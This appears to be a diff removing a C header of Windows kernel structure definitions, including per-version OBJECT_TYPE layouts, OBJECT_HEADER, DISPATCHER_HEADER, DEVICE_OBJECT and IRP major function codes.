-// -typedef struct _OBJECT_TYPE_INITIALIZER_COMPATIBLE {// Size=120 - USHORT Length; // Size=2 Offset=0 - UCHAR ObjectTypeFlags; // Size=1 Offset=2 - ULONG ObjectTypeCode; // Size=4 Offset=4 - ULONG InvalidAttributes; // Size=4 Offset=8 - GENERIC_MAPPING GenericMapping; // Size=16 Offset=12 - ULONG ValidAccessMask; // Size=4 Offset=28 - ULONG RetainAccess; // Size=4 Offset=32 - POOL_TYPE PoolType; // Size=4 Offset=36 - ULONG DefaultPagedPoolCharge; // Size=4 Offset=40 - ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44 - PVOID DumpProcedure; // Size=8 Offset=48 - PVOID OpenProcedure; // Size=8 Offset=56 - PVOID CloseProcedure; // Size=8 Offset=64 - PVOID DeleteProcedure; // Size=8 Offset=72 - PVOID ParseProcedure; // Size=8 Offset=80 - PVOID SecurityProcedure; // Size=8 Offset=88 - PVOID QueryNameProcedure; // Size=8 Offset=96 - PVOID OkayToCloseProcedure; // Size=8 Offset=104 -} OBJECT_TYPE_INITIALIZER_COMPATIBLE, *POBJECT_TYPE_INITIALIZER_COMPATIBLE; - -// -// WARNING this structure is incomplete, refer to complete definitions below if you need actual full variant. -// -typedef struct _OBJECT_TYPE_COMPATIBLE { - LIST_ENTRY TypeList; - UNICODE_STRING Name; - PVOID DefaultObject; - UCHAR Index; - ULONG TotalNumberOfObjects; - ULONG TotalNumberOfHandles; - ULONG HighWaterNumberOfObjects; - ULONG HighWaterNumberOfHandles; - OBJECT_TYPE_INITIALIZER_COMPATIBLE TypeInfo; -} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE; -typedef POBJECT_TYPE_COMPATIBLE POBJECT_TYPE; - -// -// Complete definitions of OBJECT_TYPE + OBJECT_TYPE_INITIALIZER per Windows version. 
-// - -typedef struct _OBJECT_TYPE_INITIALIZER_7 { - USHORT Length; - union - { - UCHAR ObjectTypeFlags; - struct - { - UCHAR CaseInsensitive : 1; - UCHAR UnnamedObjectsOnly : 1; - UCHAR UseDefaultObject : 1; - UCHAR SecurityRequired : 1; - UCHAR MaintainHandleCount : 1; - UCHAR MaintainTypeList : 1; - UCHAR SupportsObjectCallbacks : 1; - }; - }; - ULONG ObjectTypeCode; - ULONG InvalidAttributes; - GENERIC_MAPPING GenericMapping; - ULONG ValidAccessMask; - ULONG RetainAccess; - POOL_TYPE PoolType; - ULONG DefaultPagedPoolCharge; - ULONG DefaultNonPagedPoolCharge; - PVOID DumpProcedure; - PVOID OpenProcedure; - PVOID CloseProcedure; - PVOID DeleteProcedure; - PVOID ParseProcedure; - PVOID SecurityProcedure; - PVOID QueryNameProcedure; - PVOID OkayToCloseProcedure; -} OBJECT_TYPE_INITIALIZER_7, *POBJECT_TYPE_INITIALIZER_7; - -// -// Windows 8, new object type flag, WaitObject* members added -// -typedef struct _OBJECT_TYPE_INITIALIZER_8 { - USHORT Length; - union - { - UCHAR ObjectTypeFlags; - struct - { - UCHAR CaseInsensitive : 1; - UCHAR UnnamedObjectsOnly : 1; - UCHAR UseDefaultObject : 1; - UCHAR SecurityRequired : 1; - UCHAR MaintainHandleCount : 1; - UCHAR MaintainTypeList : 1; - UCHAR SupportsObjectCallbacks : 1; - UCHAR CacheAligned : 1; - }; - }; - ULONG ObjectTypeCode; - ULONG InvalidAttributes; - GENERIC_MAPPING GenericMapping; - ULONG ValidAccessMask; - ULONG RetainAccess; - POOL_TYPE PoolType; - ULONG DefaultPagedPoolCharge; - ULONG DefaultNonPagedPoolCharge; - PVOID DumpProcedure; - PVOID OpenProcedure; - PVOID CloseProcedure; - PVOID DeleteProcedure; - PVOID ParseProcedure; - PVOID SecurityProcedure; - PVOID QueryNameProcedure; - PVOID OkayToCloseProcedure; - ULONG WaitObjectFlagMask; - USHORT WaitObjectFlagOffset; - USHORT WaitObjectPointerOffset; -} OBJECT_TYPE_INITIALIZER_8, *POBJECT_TYPE_INITIALIZER_8; - -// -// Windows 10 RS1, new ObjectTypeFlags2 flag added, -// ParseProcedure now has two variants with different parameters. 
-// -typedef struct _OBJECT_TYPE_INITIALIZER_RS1 { - USHORT Length; - union - { - UCHAR ObjectTypeFlags; - struct - { - UCHAR CaseInsensitive : 1; - UCHAR UnnamedObjectsOnly : 1; - UCHAR UseDefaultObject : 1; - UCHAR SecurityRequired : 1; - UCHAR MaintainHandleCount : 1; - UCHAR MaintainTypeList : 1; - UCHAR SupportsObjectCallbacks : 1; - UCHAR CacheAligned : 1; - }; - }; - union - { - UCHAR ObjectTypeFlags2; //for ParseProcedureEx - struct - { - UCHAR UseExtendedParameters : 1; - UCHAR Reserved : 7; - }; - }; - ULONG ObjectTypeCode; - ULONG InvalidAttributes; - GENERIC_MAPPING GenericMapping; - ULONG ValidAccessMask; - ULONG RetainAccess; - POOL_TYPE PoolType; - ULONG DefaultPagedPoolCharge; - ULONG DefaultNonPagedPoolCharge; - PVOID DumpProcedure; - PVOID OpenProcedure; - PVOID CloseProcedure; - PVOID DeleteProcedure; - union { - PVOID ParseProcedure; - PVOID ParseProcedureEx; - }; - PVOID SecurityProcedure; - PVOID QueryNameProcedure; - PVOID OkayToCloseProcedure; - ULONG WaitObjectFlagMask; - USHORT WaitObjectFlagOffset; - USHORT WaitObjectPointerOffset; -} OBJECT_TYPE_INITIALIZER_RS1, *POBJECT_TYPE_INITIALIZER_RS1; - -// -// ObjectTypeFlags2 moved to extended to USHORT ObjectTypeFlags field. -// It was that hard to do this since beginning? 
-// -typedef struct _OBJECT_TYPE_INITIALIZER_RS2 { - USHORT Length; - union - { - USHORT ObjectTypeFlags; - struct - { - UCHAR CaseInsensitive : 1; - UCHAR UnnamedObjectsOnly : 1; - UCHAR UseDefaultObject : 1; - UCHAR SecurityRequired : 1; - UCHAR MaintainHandleCount : 1; - UCHAR MaintainTypeList : 1; - UCHAR SupportsObjectCallbacks : 1; - UCHAR CacheAligned : 1; - }; - struct - { - UCHAR UseExtendedParameters : 1;//for ParseProcedureEx - UCHAR Reserved : 7; - }; - }; - ULONG ObjectTypeCode; - ULONG InvalidAttributes; - GENERIC_MAPPING GenericMapping; - ULONG ValidAccessMask; - ULONG RetainAccess; - POOL_TYPE PoolType; - ULONG DefaultPagedPoolCharge; - ULONG DefaultNonPagedPoolCharge; - PVOID DumpProcedure; - PVOID OpenProcedure; - PVOID CloseProcedure; - PVOID DeleteProcedure; - union { - PVOID ParseProcedure; - PVOID ParseProcedureEx; - }; - PVOID SecurityProcedure; - PVOID QueryNameProcedure; - PVOID OkayToCloseProcedure; - ULONG WaitObjectFlagMask; - USHORT WaitObjectFlagOffset; - USHORT WaitObjectPointerOffset; -} OBJECT_TYPE_INITIALIZER_RS2, *POBJECT_TYPE_INITIALIZER_RS2; - -// -// OBJECT_TYPE definition vary only because of OBJECT_TYPE_INITIALIZER changes. 
-// -typedef struct _OBJECT_TYPE_7 { - LIST_ENTRY TypeList; - UNICODE_STRING Name; - PVOID DefaultObject; - UCHAR Index; - ULONG TotalNumberOfObjects; - ULONG TotalNumberOfHandles; - ULONG HighWaterNumberOfObjects; - ULONG HighWaterNumberOfHandles; - OBJECT_TYPE_INITIALIZER_7 TypeInfo; - EX_PUSH_LOCK TypeLock; - ULONG Key; - LIST_ENTRY CallbackList; -} OBJECT_TYPE_7, POBJECT_TYPE_7; - -typedef struct _OBJECT_TYPE_8 { - LIST_ENTRY TypeList; - UNICODE_STRING Name; - PVOID DefaultObject; - UCHAR Index; - ULONG TotalNumberOfObjects; - ULONG TotalNumberOfHandles; - ULONG HighWaterNumberOfObjects; - ULONG HighWaterNumberOfHandles; - OBJECT_TYPE_INITIALIZER_8 TypeInfo; - EX_PUSH_LOCK TypeLock; - ULONG Key; - LIST_ENTRY CallbackList; -} OBJECT_TYPE_8, POBJECT_TYPE_8; - -typedef struct _OBJECT_TYPE_RS1 { - LIST_ENTRY TypeList; - UNICODE_STRING Name; - PVOID DefaultObject; - UCHAR Index; - ULONG TotalNumberOfObjects; - ULONG TotalNumberOfHandles; - ULONG HighWaterNumberOfObjects; - ULONG HighWaterNumberOfHandles; - OBJECT_TYPE_INITIALIZER_RS1 TypeInfo; - EX_PUSH_LOCK TypeLock; - ULONG Key; - LIST_ENTRY CallbackList; -} OBJECT_TYPE_RS1, POBJECT_TYPE_RS1; - -typedef struct _OBJECT_TYPE_RS2 { - LIST_ENTRY TypeList; - UNICODE_STRING Name; - PVOID DefaultObject; - UCHAR Index; - ULONG TotalNumberOfObjects; - ULONG TotalNumberOfHandles; - ULONG HighWaterNumberOfObjects; - ULONG HighWaterNumberOfHandles; - OBJECT_TYPE_INITIALIZER_RS2 TypeInfo; - EX_PUSH_LOCK TypeLock; - ULONG Key; - LIST_ENTRY CallbackList; -} OBJECT_TYPE_RS2, POBJECT_TYPE_RS2; - -/* -** brand new header starting from 6.1 -*/ - -typedef struct _OBJECT_HEADER { - LONG PointerCount; - union - { - LONG HandleCount; - PVOID NextToFree; - }; - EX_PUSH_LOCK Lock; - UCHAR TypeIndex; - UCHAR TraceFlags; - UCHAR InfoMask; - UCHAR Flags; - union - { - POBJECT_CREATE_INFORMATION ObjectCreateInfo; - PVOID QuotaBlockCharged; - }; - PVOID SecurityDescriptor; - QUAD Body; -} OBJECT_HEADER, *POBJECT_HEADER; - -#define 
OBJECT_TO_OBJECT_HEADER(obj) \ - CONTAINING_RECORD( (obj), OBJECT_HEADER, Body ) - -/* -** OBJECT MANAGER END -*/ - -/* -* WDM START -*/ -#define TIMER_TOLERABLE_DELAY_BITS 6 -#define TIMER_EXPIRED_INDEX_BITS 6 -#define TIMER_PROCESSOR_INDEX_BITS 5 - -typedef struct _DISPATCHER_HEADER { - union { - union { - volatile LONG Lock; - LONG LockNV; - } DUMMYUNIONNAME; - - struct { // Events, Semaphores, Gates, etc. - UCHAR Type; // All (accessible via KOBJECT_TYPE) - UCHAR Signalling; - UCHAR Size; - UCHAR Reserved1; - } DUMMYSTRUCTNAME; - - struct { // Timer - UCHAR TimerType; - union { - UCHAR TimerControlFlags; - struct { - UCHAR Absolute : 1; - UCHAR Wake : 1; - UCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS; - } DUMMYSTRUCTNAME; - }; - - UCHAR Hand; - union { - UCHAR TimerMiscFlags; - struct { - -#if !defined(KENCODED_TIMER_PROCESSOR) - - UCHAR Index : TIMER_EXPIRED_INDEX_BITS; - -#else - - UCHAR Index : 1; - UCHAR Processor : TIMER_PROCESSOR_INDEX_BITS; - -#endif - - UCHAR Inserted : 1; - volatile UCHAR Expired : 1; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; - } DUMMYSTRUCTNAME2; - - struct { // Timer2 - UCHAR Timer2Type; - union { - UCHAR Timer2Flags; - struct { - UCHAR Timer2Inserted : 1; - UCHAR Timer2Expiring : 1; - UCHAR Timer2CancelPending : 1; - UCHAR Timer2SetPending : 1; - UCHAR Timer2Running : 1; - UCHAR Timer2Disabled : 1; - UCHAR Timer2ReservedFlags : 2; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; - - UCHAR Timer2Reserved1; - UCHAR Timer2Reserved2; - } DUMMYSTRUCTNAME3; - - struct { // Queue - UCHAR QueueType; - union { - UCHAR QueueControlFlags; - struct { - UCHAR Abandoned : 1; - UCHAR DisableIncrement : 1; - UCHAR QueueReservedControlFlags : 6; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; - - UCHAR QueueSize; - UCHAR QueueReserved; - } DUMMYSTRUCTNAME4; - - struct { // Thread - UCHAR ThreadType; - UCHAR ThreadReserved; - union { - UCHAR ThreadControlFlags; - struct { - UCHAR CycleProfiling : 1; - UCHAR CounterProfiling : 1; - UCHAR GroupScheduling : 
1;
- UCHAR AffinitySet : 1;
- UCHAR ThreadReservedControlFlags : 4;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-
- union {
- UCHAR DebugActive;
-
-#if !defined(_X86_)
-
- struct {
- BOOLEAN ActiveDR7 : 1;
- BOOLEAN Instrumented : 1;
- BOOLEAN Minimal : 1;
- BOOLEAN Reserved4 : 3;
- BOOLEAN UmsScheduled : 1;
- BOOLEAN UmsPrimary : 1;
- } DUMMYSTRUCTNAME;
-
-#endif
-
- } DUMMYUNIONNAME2;
- } DUMMYSTRUCTNAME5;
-
- struct { // Mutant
- UCHAR MutantType;
- UCHAR MutantSize;
- BOOLEAN DpcActive;
- UCHAR MutantReserved;
- } DUMMYSTRUCTNAME6;
- } DUMMYUNIONNAME;
-
- LONG SignalState; // Object lock
- LIST_ENTRY WaitListHead; // Object lock
-} DISPATCHER_HEADER, *PDISPATCHER_HEADER;
-
-typedef struct _KEVENT {
- DISPATCHER_HEADER Header;
-} KEVENT, *PKEVENT, *PRKEVENT;
-
-typedef struct _FAST_MUTEX {
- LONG_PTR Count;
- void *Owner;
- ULONG Contention;
- struct _KEVENT Event;
- ULONG OldIrql;
- LONG __PADDING__[1];
-} FAST_MUTEX, *PFAST_MUTEX;
-
-typedef struct _KMUTANT {
- DISPATCHER_HEADER Header;
- LIST_ENTRY MutantListEntry;
- struct _KTHREAD *OwnerThread;
- BOOLEAN Abandoned;
- UCHAR ApcDisable;
-} KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX;
-
-typedef struct _KSEMAPHORE {
- DISPATCHER_HEADER Header;
- LONG Limit;
-} KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE;
-
-typedef struct _KTIMER {
- DISPATCHER_HEADER Header;
- ULARGE_INTEGER DueTime;
- LIST_ENTRY TimerListEntry;
- struct _KDPC *Dpc;
- ULONG Processor;
- LONG Period;
-} KTIMER, *PKTIMER, *PRKTIMER;
-
-typedef struct _KDEVICE_QUEUE_ENTRY {
- LIST_ENTRY DeviceListEntry;
- ULONG SortKey;
- BOOLEAN Inserted;
-} KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY;
-
-typedef enum _KDPC_IMPORTANCE {
- LowImportance,
- MediumImportance,
- HighImportance
-} KDPC_IMPORTANCE;
-
-typedef struct _KDPC {
- union {
- ULONG TargetInfoAsUlong;
- struct {
- UCHAR Type;
- UCHAR Importance;
- volatile USHORT Number;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-
- SINGLE_LIST_ENTRY DpcListEntry;
- KAFFINITY 
ProcessorHistory;
- PVOID DeferredRoutine;
- PVOID DeferredContext;
- PVOID SystemArgument1;
- PVOID SystemArgument2;
- __volatile PVOID DpcData;
-} KDPC, *PKDPC, *PRKDPC;
-
-typedef struct _WAIT_CONTEXT_BLOCK {
- union {
- KDEVICE_QUEUE_ENTRY WaitQueueEntry;
- struct {
- LIST_ENTRY DmaWaitEntry;
- ULONG NumberOfChannels;
- ULONG SyncCallback : 1;
- ULONG DmaContext : 1;
- ULONG Reserved : 30;
- };
- };
- PVOID DeviceRoutine;
- PVOID DeviceContext;
- ULONG NumberOfMapRegisters;
- PVOID DeviceObject;
- PVOID CurrentIrp;
- PKDPC BufferChainingDpc;
-} WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK;
-
-#define MAXIMUM_VOLUME_LABEL_LENGTH (32 * sizeof(WCHAR)) // 32 characters
-
-typedef struct _VPB {
- CSHORT Type;
- CSHORT Size;
- USHORT Flags;
- USHORT VolumeLabelLength; // in bytes
- struct _DEVICE_OBJECT *DeviceObject;
- struct _DEVICE_OBJECT *RealDevice;
- ULONG SerialNumber;
- ULONG ReferenceCount;
- WCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)];
-} VPB, *PVPB;
-
-typedef struct _KQUEUE {
- DISPATCHER_HEADER Header;
- LIST_ENTRY EntryListHead;
- ULONG CurrentCount;
- ULONG MaximumCount;
- LIST_ENTRY ThreadListHead;
-} KQUEUE, *PKQUEUE;
-
-typedef struct _KDEVICE_QUEUE {
- CSHORT Type;
- CSHORT Size;
- LIST_ENTRY DeviceListHead;
- KSPIN_LOCK Lock;
-
-#if defined(_AMD64_)
-
- union {
- BOOLEAN Busy;
- struct {
- LONG64 Reserved : 8;
- LONG64 Hint : 56;
- };
- };
-
-#else
-
- BOOLEAN Busy;
-
-#endif
-
-} KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE;
-
-enum _KOBJECTS {
- EventNotificationObject = 0x0,
- EventSynchronizationObject = 0x1,
- MutantObject = 0x2,
- ProcessObject = 0x3,
- QueueObject = 0x4,
- SemaphoreObject = 0x5,
- ThreadObject = 0x6,
- GateObject = 0x7,
- TimerNotificationObject = 0x8,
- TimerSynchronizationObject = 0x9,
- Spare2Object = 0xa,
- Spare3Object = 0xb,
- Spare4Object = 0xc,
- Spare5Object = 0xd,
- Spare6Object = 0xe,
- Spare7Object = 0xf,
- Spare8Object = 0x10,
- Spare9Object = 0x11,
- ApcObject = 0x12,
- DpcObject = 0x13,
- 
DeviceQueueObject = 0x14,
- EventPairObject = 0x15,
- InterruptObject = 0x16,
- ProfileObject = 0x17,
- ThreadedDpcObject = 0x18,
- MaximumKernelObject = 0x19,
-};
-
-#define DO_VERIFY_VOLUME 0x00000002 // ntddk nthal ntifs wdm
-#define DO_BUFFERED_IO 0x00000004 // ntddk nthal ntifs wdm
-#define DO_EXCLUSIVE 0x00000008 // ntddk nthal ntifs wdm
-#define DO_DIRECT_IO 0x00000010 // ntddk nthal ntifs wdm
-#define DO_MAP_IO_BUFFER 0x00000020 // ntddk nthal ntifs wdm
-#define DO_DEVICE_HAS_NAME 0x00000040 // ntddk nthal ntifs
-#define DO_DEVICE_INITIALIZING 0x00000080 // ntddk nthal ntifs wdm
-#define DO_SYSTEM_BOOT_PARTITION 0x00000100 // ntddk nthal ntifs
-#define DO_LONG_TERM_REQUESTS 0x00000200 // ntddk nthal ntifs
-#define DO_NEVER_LAST_DEVICE 0x00000400 // ntddk nthal ntifs
-#define DO_SHUTDOWN_REGISTERED 0x00000800 // ntddk nthal ntifs wdm
-#define DO_BUS_ENUMERATED_DEVICE 0x00001000 // ntddk nthal ntifs wdm
-#define DO_POWER_PAGABLE 0x00002000 // ntddk nthal ntifs wdm
-#define DO_POWER_INRUSH 0x00004000 // ntddk nthal ntifs wdm
-#define DO_POWER_NOOP 0x00008000
-#define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs
-#define DO_XIP 0x00020000
-
-#define FILE_REMOVABLE_MEDIA 0x00000001
-#define FILE_READ_ONLY_DEVICE 0x00000002
-#define FILE_FLOPPY_DISKETTE 0x00000004
-#define FILE_WRITE_ONCE_MEDIA 0x00000008
-#define FILE_REMOTE_DEVICE 0x00000010
-#define FILE_DEVICE_IS_MOUNTED 0x00000020
-#define FILE_VIRTUAL_VOLUME 0x00000040
-#define FILE_AUTOGENERATED_DEVICE_NAME 0x00000080
-#define FILE_DEVICE_SECURE_OPEN 0x00000100
-#define FILE_CHARACTERISTIC_PNP_DEVICE 0x00000800
-#define FILE_CHARACTERISTIC_TS_DEVICE 0x00001000
-#define FILE_CHARACTERISTIC_WEBDAV_DEVICE 0x00002000
-#define FILE_CHARACTERISTIC_CSV 0x00010000
-#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000
-#define FILE_PORTABLE_DEVICE 0x00040000
-
-#define FILE_DEVICE_BEEP 0x00000001
-#define FILE_DEVICE_CD_ROM 0x00000002
-#define FILE_DEVICE_CD_ROM_FILE_SYSTEM 0x00000003
-#define 
FILE_DEVICE_CONTROLLER 0x00000004
-#define FILE_DEVICE_DATALINK 0x00000005
-#define FILE_DEVICE_DFS 0x00000006
-#define FILE_DEVICE_DISK 0x00000007
-#define FILE_DEVICE_DISK_FILE_SYSTEM 0x00000008
-#define FILE_DEVICE_FILE_SYSTEM 0x00000009
-#define FILE_DEVICE_INPORT_PORT 0x0000000a
-#define FILE_DEVICE_KEYBOARD 0x0000000b
-#define FILE_DEVICE_MAILSLOT 0x0000000c
-#define FILE_DEVICE_MIDI_IN 0x0000000d
-#define FILE_DEVICE_MIDI_OUT 0x0000000e
-#define FILE_DEVICE_MOUSE 0x0000000f
-#define FILE_DEVICE_MULTI_UNC_PROVIDER 0x00000010
-#define FILE_DEVICE_NAMED_PIPE 0x00000011
-#define FILE_DEVICE_NETWORK 0x00000012
-#define FILE_DEVICE_NETWORK_BROWSER 0x00000013
-#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014
-#define FILE_DEVICE_NULL 0x00000015
-#define FILE_DEVICE_PARALLEL_PORT 0x00000016
-#define FILE_DEVICE_PHYSICAL_NETCARD 0x00000017
-#define FILE_DEVICE_PRINTER 0x00000018
-#define FILE_DEVICE_SCANNER 0x00000019
-#define FILE_DEVICE_SERIAL_MOUSE_PORT 0x0000001a
-#define FILE_DEVICE_SERIAL_PORT 0x0000001b
-#define FILE_DEVICE_SCREEN 0x0000001c
-#define FILE_DEVICE_SOUND 0x0000001d
-#define FILE_DEVICE_STREAMS 0x0000001e
-#define FILE_DEVICE_TAPE 0x0000001f
-#define FILE_DEVICE_TAPE_FILE_SYSTEM 0x00000020
-#define FILE_DEVICE_TRANSPORT 0x00000021
-#define FILE_DEVICE_UNKNOWN 0x00000022
-#define FILE_DEVICE_VIDEO 0x00000023
-#define FILE_DEVICE_VIRTUAL_DISK 0x00000024
-#define FILE_DEVICE_WAVE_IN 0x00000025
-#define FILE_DEVICE_WAVE_OUT 0x00000026
-#define FILE_DEVICE_8042_PORT 0x00000027
-#define FILE_DEVICE_NETWORK_REDIRECTOR 0x00000028
-#define FILE_DEVICE_BATTERY 0x00000029
-#define FILE_DEVICE_BUS_EXTENDER 0x0000002a
-#define FILE_DEVICE_MODEM 0x0000002b
-#define FILE_DEVICE_VDM 0x0000002c
-#define FILE_DEVICE_MASS_STORAGE 0x0000002d
-#define FILE_DEVICE_SMB 0x0000002e
-#define FILE_DEVICE_KS 0x0000002f
-#define FILE_DEVICE_CHANGER 0x00000030
-#define FILE_DEVICE_SMARTCARD 0x00000031
-#define FILE_DEVICE_ACPI 0x00000032
-#define FILE_DEVICE_DVD 0x00000033 
-#define FILE_DEVICE_FULLSCREEN_VIDEO 0x00000034
-#define FILE_DEVICE_DFS_FILE_SYSTEM 0x00000035
-#define FILE_DEVICE_DFS_VOLUME 0x00000036
-#define FILE_DEVICE_SERENUM 0x00000037
-#define FILE_DEVICE_TERMSRV 0x00000038
-#define FILE_DEVICE_KSEC 0x00000039
-#define FILE_DEVICE_FIPS 0x0000003A
-#define FILE_DEVICE_INFINIBAND 0x0000003B
-#define FILE_DEVICE_VMBUS 0x0000003E
-#define FILE_DEVICE_CRYPT_PROVIDER 0x0000003F
-#define FILE_DEVICE_WPD 0x00000040
-#define FILE_DEVICE_BLUETOOTH 0x00000041
-#define FILE_DEVICE_MT_COMPOSITE 0x00000042
-#define FILE_DEVICE_MT_TRANSPORT 0x00000043
-#define FILE_DEVICE_BIOMETRIC 0x00000044
-#define FILE_DEVICE_PMI 0x00000045
-#define FILE_DEVICE_EHSTOR 0x00000046
-#define FILE_DEVICE_DEVAPI 0x00000047
-#define FILE_DEVICE_GPIO 0x00000048
-#define FILE_DEVICE_USBEX 0x00000049
-#define FILE_DEVICE_CONSOLE 0x00000050
-#define FILE_DEVICE_NFP 0x00000051
-#define FILE_DEVICE_SYSENV 0x00000052
-#define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053
-#define FILE_DEVICE_POINT_OF_SERVICE 0x00000054
-
-#define FILE_BYTE_ALIGNMENT 0x00000000
-#define FILE_WORD_ALIGNMENT 0x00000001
-#define FILE_LONG_ALIGNMENT 0x00000003
-#define FILE_QUAD_ALIGNMENT 0x00000007
-#define FILE_OCTA_ALIGNMENT 0x0000000f
-#define FILE_32_BYTE_ALIGNMENT 0x0000001f
-#define FILE_64_BYTE_ALIGNMENT 0x0000003f
-#define FILE_128_BYTE_ALIGNMENT 0x0000007f
-#define FILE_256_BYTE_ALIGNMENT 0x000000ff
-#define FILE_512_BYTE_ALIGNMENT 0x000001ff
-
-#define DPC_NORMAL 0
-#define DPC_THREADED 1
-
-typedef struct _DEVICE_OBJECT {
- CSHORT Type;
- USHORT Size;
- LONG ReferenceCount;
- struct _DRIVER_OBJECT *DriverObject;
- struct _DEVICE_OBJECT *NextDevice;
- struct _DEVICE_OBJECT *AttachedDevice;
- struct _IRP *CurrentIrp;
- PVOID Timer;
- ULONG Flags;
- ULONG Characteristics;
- __volatile PVPB Vpb;
- PVOID DeviceExtension;
- DEVICE_TYPE DeviceType;
- CCHAR StackSize;
- union {
- LIST_ENTRY ListEntry;
- WAIT_CONTEXT_BLOCK Wcb;
- } Queue;
- ULONG AlignmentRequirement;
- KDEVICE_QUEUE 
DeviceQueue;
- KDPC Dpc;
- ULONG ActiveThreadCount;
- PSECURITY_DESCRIPTOR SecurityDescriptor;
- KEVENT DeviceLock;
- USHORT SectorSize;
- USHORT Spare1;
- struct _DEVOBJ_EXTENSION * DeviceObjectExtension;
- PVOID Reserved;
-} DEVICE_OBJECT, *PDEVICE_OBJECT;
-
-typedef struct _DEVOBJ_EXTENSION {
-
- CSHORT Type;
- USHORT Size;
-
- //
- // Public part of the DeviceObjectExtension structure
- //
-
- PDEVICE_OBJECT DeviceObject; // owning device object
-
- // end_ntddk end_nthal end_ntifs end_wdm end_ntosp
-
- //
- // Universal Power Data - all device objects must have this
- //
-
- ULONG PowerFlags; // see ntos\po\pop.h
- // WARNING: Access via PO macros
- // and with PO locking rules ONLY.
-
- //
- // Pointer to the non-universal power data
- // Power data that only some device objects need is stored in the
- // device object power extension -> DOPE
- // see po.h
- //
-
- struct _DEVICE_OBJECT_POWER_EXTENSION *Dope;
-
- //
- // power state information
- //
-
- //
- // Device object extension flags. Protected by the IopDatabaseLock.
- //
-
- ULONG ExtensionFlags;
-
- //
- // PnP manager fields
- //
-
- PVOID DeviceNode;
-
- //
- // AttachedTo is a pointer to the device object that this device
- // object is attached to. The attachment chain is now doubly
- // linked: this pointer and DeviceObject->AttachedDevice provide the
- // linkage.
- //
-
- PDEVICE_OBJECT AttachedTo;
-
- //
- // The next two fields are used to prevent recursion in IoStartNextPacket
- // interfaces.
- //
-
- LONG StartIoCount; // Used to keep track of number of pending start ios.
- LONG StartIoKey; // Next startio key
- ULONG StartIoFlags; // Start Io Flags. Need a separate flag so that it can be accessed without locks
- PVPB Vpb; // If not NULL contains the VPB of the mounted volume.
- // Set in the filesystem's volume device object.
- // This is a reverse VPB pointer. 
-
- // begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp
-
-} DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION;
-
-typedef struct _FAST_IO_DISPATCH {
- ULONG SizeOfFastIoDispatch;
- PVOID FastIoCheckIfPossible;
- PVOID FastIoRead;
- PVOID FastIoWrite;
- PVOID FastIoQueryBasicInfo;
- PVOID FastIoQueryStandardInfo;
- PVOID FastIoLock;
- PVOID FastIoUnlockSingle;
- PVOID FastIoUnlockAll;
- PVOID FastIoUnlockAllByKey;
- PVOID FastIoDeviceControl;
- PVOID AcquireFileForNtCreateSection;
- PVOID ReleaseFileForNtCreateSection;
- PVOID FastIoDetachDevice;
- PVOID FastIoQueryNetworkOpenInfo;
- PVOID AcquireForModWrite;
- PVOID MdlRead;
- PVOID MdlReadComplete;
- PVOID PrepareMdlWrite;
- PVOID MdlWriteComplete;
- PVOID FastIoReadCompressed;
- PVOID FastIoWriteCompressed;
- PVOID MdlReadCompleteCompressed;
- PVOID MdlWriteCompleteCompressed;
- PVOID FastIoQueryOpen;
- PVOID ReleaseForModWrite;
- PVOID AcquireForCcFlush;
- PVOID ReleaseForCcFlush;
-} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;
-
-#define IO_TYPE_ADAPTER 0x00000001
-#define IO_TYPE_CONTROLLER 0x00000002
-#define IO_TYPE_DEVICE 0x00000003
-#define IO_TYPE_DRIVER 0x00000004
-#define IO_TYPE_FILE 0x00000005
-#define IO_TYPE_IRP 0x00000006
-#define IO_TYPE_MASTER_ADAPTER 0x00000007
-#define IO_TYPE_OPEN_PACKET 0x00000008
-#define IO_TYPE_TIMER 0x00000009
-#define IO_TYPE_VPB 0x0000000a
-#define IO_TYPE_ERROR_LOG 0x0000000b
-#define IO_TYPE_ERROR_MESSAGE 0x0000000c
-#define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d
-
-#define IRP_MJ_CREATE 0x00
-#define IRP_MJ_CREATE_NAMED_PIPE 0x01
-#define IRP_MJ_CLOSE 0x02
-#define IRP_MJ_READ 0x03
-#define IRP_MJ_WRITE 0x04
-#define IRP_MJ_QUERY_INFORMATION 0x05
-#define IRP_MJ_SET_INFORMATION 0x06
-#define IRP_MJ_QUERY_EA 0x07
-#define IRP_MJ_SET_EA 0x08
-#define IRP_MJ_FLUSH_BUFFERS 0x09
-#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
-#define IRP_MJ_SET_VOLUME_INFORMATION 0x0b
-#define IRP_MJ_DIRECTORY_CONTROL 0x0c
-#define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d
-#define IRP_MJ_DEVICE_CONTROL 
0x0e
-#define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f
-#define IRP_MJ_SHUTDOWN 0x10
-#define IRP_MJ_LOCK_CONTROL 0x11
-#define IRP_MJ_CLEANUP 0x12
-#define IRP_MJ_CREATE_MAILSLOT 0x13
-#define IRP_MJ_QUERY_SECURITY 0x14
-#define IRP_MJ_SET_SECURITY 0x15
-#define IRP_MJ_POWER 0x16
-#define IRP_MJ_SYSTEM_CONTROL 0x17
